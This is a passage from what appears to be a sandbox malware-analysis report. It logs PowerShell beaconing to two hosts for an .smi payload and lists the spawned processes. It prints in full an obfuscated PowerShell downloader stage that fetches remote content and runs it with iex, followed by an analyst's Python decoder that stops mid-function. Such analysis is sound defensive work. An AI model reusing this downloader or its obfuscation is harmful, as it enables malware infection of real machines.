2024-12-05 09:40:43 UTC | 98 | OUT | GET /wh/Subordinerendes78.smi HTTP/1.1
    Host: www.erp-royal-crown.info
    Connection: Keep-Alive
2024-12-05 09:40:44 UTC | 238 | IN | HTTP/1.1 404 Not Found
    Connection: close
    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
    pragma: no-cache
    content-type: text/html
    content-length: 1251
    date: Thu, 05 Dec 2024 09:40:44 GMT
    server: LiteSpeed
2024-12-05 09:40:44 UTC | 1130 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-12-05 09:40:44 UTC | 121 | IN | Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.10 | 49935 | 184.171.244.231 | 443 | 8156 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:40:49 UTC | 89 | OUT | GET /wh/Subordinerendes78.smi HTTP/1.1
    Host: www.almrwad.com
    Connection: Keep-Alive
2024-12-05 09:40:50 UTC | 164 | IN | HTTP/1.1 404 Not Found
    Date: Thu, 05 Dec 2024 09:40:49 GMT
    Server: Apache
    Content-Length: 315
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
2024-12-05 09:40:50 UTC | 315 | IN | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                            Session ID: 16 | Source IP: 192.168.2.10 | Source Port: 49947 | Destination IP: 148.251.114.233 | Destination Port: 443 | PID: 8156 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            2024-12-05 09:40:55 UTC | 98 | OUT | GET /wh/Subordinerendes78.smi HTTP/1.1
                                                                            Host: www.erp-royal-crown.info
                                                                            Connection: Keep-Alive
                                                                            2024-12-05 09:40:55 UTC | 238 | IN | HTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 1251
                                                                            date: Thu, 05 Dec 2024 09:40:55 GMT
                                                                            server: LiteSpeed
                                                                            2024-12-05 09:40:55 UTC | 1130 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                            2024-12-05 09:40:55 UTC | 121 | IN | Data Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                            Session ID: 17 | Source IP: 192.168.2.10 | Source Port: 49963 | Destination IP: 184.171.244.231 | Destination Port: 443 | PID: 8156 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            2024-12-05 09:41:01 UTC | 89 | OUT | GET /wh/Subordinerendes78.smi HTTP/1.1
                                                                            Host: www.almrwad.com
                                                                            Connection: Keep-Alive
                                                                            2024-12-05 09:41:01 UTC | 164 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Thu, 05 Dec 2024 09:41:01 GMT
                                                                            Server: Apache
                                                                            Content-Length: 315
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            2024-12-05 09:41:01 UTC | 315 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                            Session ID: 18 | Source IP: 192.168.2.10 | Source Port: 49976 | Destination IP: 148.251.114.233 | Destination Port: 443 | PID: 8156 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            2024-12-05 09:41:07 UTC | 98 | OUT | GET /wh/Subordinerendes78.smi HTTP/1.1
                                                                            Host: www.erp-royal-crown.info
                                                                            Connection: Keep-Alive
                                                                            2024-12-05 09:41:07 UTC | 238 | IN | HTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 1251
                                                                            date: Thu, 05 Dec 2024 09:41:07 GMT
                                                                            server: LiteSpeed
                                                                            2024-12-05 09:41:07 UTC | 1130 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                            2024-12-05 09:41:07 UTC | 121 | IN | Data Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                            Session ID: 19 | Source IP: 192.168.2.10 | Source Port: 49990 | Destination IP: 184.171.244.231 | Destination Port: 443 | PID: 8156 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            2024-12-05 09:41:12 UTC | 89 | OUT | GET /wh/Subordinerendes78.smi HTTP/1.1
                                                                            Host: www.almrwad.com
                                                                            Connection: Keep-Alive
                                                                            2024-12-05 09:41:13 UTC | 164 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Thu, 05 Dec 2024 09:41:13 GMT
                                                                            Server: Apache
                                                                            Content-Length: 315
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            2024-12-05 09:41:13 UTC | 315 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use



                                                                            Target ID:2
                                                                            Start time:04:39:06
                                                                            Start date:05/12/2024
                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ap.ps1"
                                                                            Imagebase:0x7ff7b2bb0000
                                                                            File size:452'608 bytes
                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:3
                                                                            Start time:04:39:07
                                                                            Start date:05/12/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff620390000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:5
                                                                            Start time:04:39:09
                                                                            Start date:05/12/2024
                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\utwxgh.vbs'"
                                                                            Imagebase:0x7ff7b2bb0000
                                                                            File size:452'608 bytes
                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:8
                                                                            Start time:04:39:28
                                                                            Start date:05/12/2024
                                                                            Path:C:\Windows\System32\wscript.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\Public\sz3.vbs"
                                                                            Imagebase:0x7ff6cb770000
                                                                            File size:170'496 bytes
                                                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:9
                                                                            Start time:04:39:28
                                                                            Start date:05/12/2024
                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. 
SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok RekoeUdmaa) exp, ');sanktionjtr (gaardspladsens 'Nouve$FrankgA.romlE,ponoThirdbVar,eaC eckl Angi:FurfuPFolliaBj.rgr BrneaSy pllMgli a ugerlD,nceiNonteaClosk=.epid$SkovgU DyslnGasliyMelaetsnesetDubbaiT,dtag Ov.rsIm.untAgrar. RejosP cnopKnaldlUdstriEnalitusik,( Comb$AfblnDA.iseePer,gaquiltkBountt.arnaighanevIntuieFremfr Impie Hu.gnUheldd LufteAto a) Sile ');sanktionjtr (gaardspladsens 'Ty,hl[Re.roNGa.teeAnskutNedsa.LilleS Forde Ind rMechovHistriBronzcUdvinejalo,PQualio wi niT ksan Tr.mtTra.iMToldva U.henDe phaSpansgHybrieDecarrBottl]Inder:Mi.un:UntraSst vse B,gvcInd auGietirLselyikva,ttLout.yTamanPArgierFjo.toAnmartIntero LigncUnsweo He slFgte Sigh.=Profe Sexga[R.klaNGged eBuddhtCyclo. 
SpheSsto.leRetaxcBijouuMessirRugnii,lidft KalvyKo mePPligtrHurraoChar tPaintoH.drac SelmoAur.clpulicTBa.isyRetropSkulle Be r]Multi:im.fs:Lsel Tta celmobilsNodia1 ejs2Chart ');$Unyttigst=$Paralalia[0];$Sportshelt= (gaardspladsens 'Urinv$ ,onog Di,ul.osanoNondibvrts,aDaughlOrtho:Ek alHGoa taHirude m.ldmFraukoUnintpContar inteotomogtDereieArbeju UdensLeu.o5Una.a3Snown=scopiNLiskae Undewbalda- .limOIntimbH enejF,ktoeJack.c Ps ctSpini Lab,SFa.veyLodsns.peletSaurueFejl.mKr kk.Scal NB.screHoftetFlers.Prin,WLiti,e uwarbv,ndiCUpbuilUnsigiBel ne Causn akset');$Sportshelt+=$Udsmeltningen[1];sanktionjtr ($Sportshelt);sanktionjtr (gaardspladsens ' alvf$P.risHLaerea,raineEskadm Foreoco,iop FortrNynazo Misdt Hexye PhotuKahausFl.ve5Ne.ro3dixli.SabbaH sveseF,revaLiljedIndspe P adrFuglesPreim[Gsac $Mas.iFSkovta Paasn PoolgAntifsK,pittTili,k Panin,iheni MetavLqwbee Gir,nTri.isExend]Overa= Fisk$EretrFSkviso Fla rEnsemlElaf nConteg SkrueAirstl ErfasTypeaeUnderr O.hasPlayb ');$Frstepladserne=gaardspladsens 'Upres$trideHRe veaPhysieStannmMinstoNondupIlma rmuseto Damptpr.geeImidouBommesHuman5No,ex3Uaktu. 
CyniDInklioTranswSigisnSm.rtlBeclooSemica Vindd Uno.FUp,igi Bilil KataeP,ash(Til a$SpdbrURestin,enziyAst ot rndstlkkeriKalkbgUncoms D.satA,lur, Selv$ArbitSStrafv .jereLuskejPochosCawineAuspirTypehePs.ud)Mm.rl ';$Svejsere=$Udsmeltningen[0];sanktionjtr (gaardspladsens 'Stand$,ytotgVarkal Tr,aoBoxlibCebriaBehanlMobil:wormsRAmm,nePunits Isdee Heiim Ste,bM.cerlGrentaAcetab askl FiceeCo.on=Recon(hofmaT,ndreeStu fsElekttpickp- ButtPUnempaFunktt Adr hdegra B nkr$Barn.STt.ekvThyroeCout.j SarasTibbie S ndrUdsp.ePrimu)Vasif ');while (!$Resemblable) {sanktionjtr (gaardspladsens 'Mango$ IliogArb jlCombpo Gipsbfi keaB,litl and:BacciU InornMazareUfat lDramaa Ulf.bDampso tormrAktena Acidt Bokoe S.nslMalocyvelli=Fa gl$BlacktPennyr Brumu.akfjeH pog ') ;sanktionjtr $Frstepladserne;sanktionjtr (gaardspladsens ' Ga,eSAnoretSmasha,ildvr,oncetForci-StillSLinjelformue Moboe Skrap Skif aller4Nicke ');sanktionjtr (gaardspladsens ' Grap$Falkegm,ctulAppelo AnlgbForstaTory,l Tine:ElectR Slideamatrs Dre e SvavmDelinblivsrlSatyraThomibUdskilCocree wird=adapi(ReamuTKseb.eUnives A,detGhett-GhettP OrgaaPa.hytWasseh Amat .eolp$veterSIndvivAm,uleTra.sjM sstsDuffieO nirr rgfoe Forb)Outa. 
') ;sanktionjtr (gaardspladsens 'Lgter$IndopgAimlelro tio CorcbOuts.aT.glvlArrhy:PulchVOlie,eHomeonFre.sufo,gasA cohhIntera.upidaMonarrMaske= Uhde$GriflgSvinal,eekeo FilmbOchera D.lelagfas: epokKMa mil Loudoallots emoneArriltSkidtt handeUfordrVulgan UnrueTakhas Coff+Newfa+qu,ry%Spise$KitteP AfplaAstigrEarboaPersplFa ilaExsanl Srvei U staPorta.TangecCompoo Mlkeu,olban overt Blod ') ;$Unyttigst=$Paralalia[$Venushaar];}$Relationsnavne=334162;$Fraflytter=29582;sanktionjtr (gaardspladsens 'Falu $ crosgSerielUnfenoRefrib ElspaMelanlFrame:P,votNGonotoAnsjons ptldDiseqiC pyrsS.lfus riftiSc,urpTekstaSlikmt Aa,eeLykkedRubrilAf,ejytrilr besky=Spiru .etskG SynseMaskit Subs-materCHustao.defonAnsvatMil.beSkuern B.rgtAppea Ploug$SemaeSSuspevM dlaePassejSprins Rac,ePlonkrAdmiteSound ');sanktionjtr (gaardspladsens 'Inapp$Marsigblon lAr,tho SkolbBedstaOp uslCoccy:OvergSSkorzuFireap GlazeOpmunrDal,ts Wiene .nrec No.crFl.mme rudttOmk aiP,admo OvarnScree Udvi=St,an V st[amen SStammyGenres KvabtAmo,peS.rafmSmitt.Un,ipCRespioFi,tnnPr grv Poc eG,naerSamdetcoope]hinde:Kompr:KrykhFGlendrPolyeoB.tonmVed,rBGersoaAnacas StineNon.e6 Tidl4RivalS isket.atchr bsiti rikenaltrigGenae(Co.ka$IncitNMisimothu,nnHaanddH.vegiUnr.vsSandbsWomaniKosyspProteaMaskit re.reVal,dd HulklHo,edyFet,r)Svov. 
');sanktionjtr (gaardspladsens 'Ka.kv$Ko,plg ,adelLimi.oCa cibUgenna UmenlLithi: BourAMetacrSekune Gurso Ha,dg Sup rD.staaSubsipOp.rvhpik,me oldorkonom Monst=Garni Scabr[D bleSUdtynyTapiosA.hudtBekose.edemmMarti.DibleTNeur,e S,gexSubautmorp .SkrifEDe epn SkadcMicrooPar gdF,gseiProdunBlomsgRecom]Milor:Ypsil:AngloANo.anSexarcCDriftI Ey pICadis.UnmilG acaneGuldstMurexSm rgitEft rrUdatei An inAttaigIsole(Uds.r$InterSIndisu.rtmapU,chaeTriazrTlpersFrstee Laerc oplr ObpyeNegrotUnc,nixenoloPlintnNonid)W nds ');sanktionjtr (gaardspladsens 'Bedre$Shan g misbl ingeoVestubKoorda Pettl.bebo: Nystn Quira ntipcikorh HalltB,conh MelaeProvenBoff.iRea dcAgate=deskt$ Kil,A EfterHool.e MechoAr ejgChastrHylstaUnnotpTurrihForudeA,rsdrNatur. SlhusBoissuou,lib,ventsDo.umtUnebrrGledeiFldstnHortegSvige(Lgdom$FodboRCam teForlol AnveaFoldetA.onyiCon,eoCo panTvrersPolitnSkspoa Th,uvRelegn Smele To k,Phase$EjendF kl,arServiaAllitf AfmulTyre.yAntiotOcta.tHonnreDigenrKaard)Petro ');sanktionjtr $naphthenic;"
                                                                            Imagebase:0x7ff7b2bb0000
                                                                            File size:452'608 bytes
                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:false

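The command line of Target ID 9 hides every string behind one helper, gaardspladsens, which keeps a single character out of every six (offset 5, step 6, stopping one character before the end because $Bellisserne is incremented from unset to 1 once $host.CurrentCulture is found non-null). The Python below is an added example written for this report, not code from the sample or from Joe Sandbox. It ports that helper and applies it to literals copied verbatim from the command line above; the $Unyttigst literal is joined across the page's line wrap after "Skjerd.ndta.", where the space before "Svrvc" is the first filler character of the next block. The decoded values account for sessions 15 to 19: two hosts, the same path, rotated by $Klosetternes++ % $Paralalia.count, with Start-Sleep 4 between attempts, and the whole stage run through iex.

```python
"""Port of the character-picking decoder used by the PowerShell stage that
wscript.exe launches (Target ID 9 above).  Added example, not code from the
sample or from Joe Sandbox.

gaardspladsens keeps one character in six: it starts at offset 5 and steps
by 6, stopping before `length - $Bellisserne`.  $Bellisserne is 1 because
`$host.CurrentCulture` is non-null and `++` turns an unset variable into 1.
Every other character of a literal is filler.
"""
from urllib.parse import urlsplit

# For ($i = 5; $i -lt $len - 1; $i += 6) { $out += $s.Substring($i, 1) }
START, STEP, TAIL = 5, 6, 1


def gaardspladsens(blob: str) -> str:
    """Return the characters at offsets 5, 11, 17, ... that lie below len(blob) - 1."""
    return "".join(blob[i] for i in range(START, len(blob) - TAIL, STEP))


# Literals copied verbatim from the Target ID 9 command line; the comment on
# each gives the sample's own variable name.  UNYTTIGST crosses the page's
# line wrap after "Skjerd.ndta."; the space before "Svrvc" is the first
# filler character of the following six-character block, not an addition.
EMANCIPERINGERNE = "Bru.hiBlideeRut,exFyl e "                      # $Emanciperingerne
DEAKTIVERENDE = "panor> atol "                                    # $Deaktiverende
FANGSTKNIVENS = "ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin "  # $Fangstknivens
SLEEP_CALL = " Ga,eSAnoretSmasha,ildvr,oncetForci-StillSLinjelformue Moboe Skrap Skif aller4Nicke "
ROTATE_URL = (                                                    # loop body, last statement
    "Lgter$IndopgAimlelro tio CorcbOuts.aT.glvlArrhy:PulchVOlie,eHomeonFre.su"
    "fo,gasA cohhIntera.upidaMonarrMaske= Uhde$GriflgSvinal,eekeo FilmbOchera"
    " D.lelagfas: epokKMa mil Loudoallots emoneArriltSkidtt handeUfordrVulgan"
    " UnrueTakhas Coff+Newfa+qu,ry%Spise$KitteP AfplaAstigrEarboaPersplFa ila"
    "Exsanl Srvei U staPorta.TangecCompoo Mlkeu,olban overt Blod "
)
UNYTTIGST = (                                                     # $Unyttigst
    "Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur.."
    "HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/"
    ",tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResune"
    "CommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eni"
    "V,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w"
    ",onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc"
    " kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanch"
    "Attak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntae"
    "ChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte "
)


def decode_stage() -> dict:
    """Decode the literals above; the URL list is split on the decoded
    $Deaktiverende delimiter exactly as the sample does ($Paralalia)."""
    delimiter = gaardspladsens(DEAKTIVERENDE)
    return {
        "invoker": gaardspladsens(EMANCIPERINGERNE),   # cmdlet used to run each decoded chunk
        "header": gaardspladsens(FANGSTKNIVENS),       # request header name set on the client
        "sleep": gaardspladsens(SLEEP_CALL),           # pause between download attempts
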